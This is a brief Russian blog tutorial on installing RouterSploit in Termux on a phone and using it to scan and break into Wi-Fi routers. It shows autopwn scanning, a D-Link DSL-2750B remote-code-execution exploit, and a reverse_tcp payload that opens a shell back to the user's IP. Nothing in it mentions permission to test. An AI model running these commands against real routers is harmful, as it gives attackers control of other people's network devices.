Найти тему
Виктор Новиков
5 подписчиков

Тестирование на проникновение роутера через телефон.

1 минута
92 прочтения

Всем привет, сегодня мы опять затронем тему тестирования различных устройств, и на очереди у нас Wi-Fi роутеры.
Все действия мы будем производить с помощью Termux.
И так начнем
Прежде чем устанавливать и запускать RouterSploit нужно прописать следующие команды:
pip install future
apt install git figlet
Описывать значение этих команд я не буду, так как большинству читателей это неинтересно. К тому же самообучение никто не отменял.
Далее прописываем:
git clone https://github.com/41Team/RoutersploitTermux

Переходим в папку RoutersploitTermux командой:

cd RoutersploitTermux

Запускаем процесс установки:
bash run.sh
По окончании, появится такое сообщение:

  • Хочу предупредить, что процесс установки занимает довольно продолжительное время, примерно 20-30 минут. Если возникнут какие-либо ошибки, то скорее всего, Вам ничто не поможет. Можете конечно попытаться найти способ, чтобы устранить их, но лично я, перепробовав несколько способов и не найдя рабочего, смирился и бросил. Так и не установив программу на свой первый смартфон (он у меня как подопытный, сначала все тестирую на нем), я попробовал установить её на другой, и о чудо - всё прошло нормально. Получается, все зависит от случая и Вашего телефона. Хотя я подозреваю, что ошибки, которые возникли на первом телефоне, связаны с тем, что он довольно старый.
    Давайте же запустим наш RouterSploit и протестируем его:
    cd ..
    cd routersploit
    python     rsf.py
    После запуска появится следующее:


  • Данная программа содержит множество эксплойтов для разных моделей роутеров: D-Link, TP-Link, Huawei, Cisco и т.д. Список всех содержащихся эксплойтов можно посмотреть, прописав команду:
    show all
    Чтобы проверить, можно ли с помощью какого-либо из имеющихся эксплойтов взломать роутер, пишем:
    use scanners/autopwn
    set target <ip роутера>, например set target 192.168.1.1
    exploit
    Далее появится список, где будет показано, подвержен ли роутер
    какой-либо уязвимости. Как видно на фото, ни одним из эксплойтов мой роутер взломать нельзя.
-2
-3
  • Если же роутер содержит ту или иную уязвимость, Вы увидите следующее:
-4

  • Показано какие эксплойты можно применить
    Чтобы применить эксплойт прописываем:
    use exploits/router/dlink/dsl_2750b_rce
    set target <ip роутера>
    check
    run
-5

  • set payload reverse_tcp
    set lhost <Ваш IP>
    run
    После этого появится сообщение, перевожу дословно: "Наслаждайся своей раковиной". Взлом прошел успешно.
-6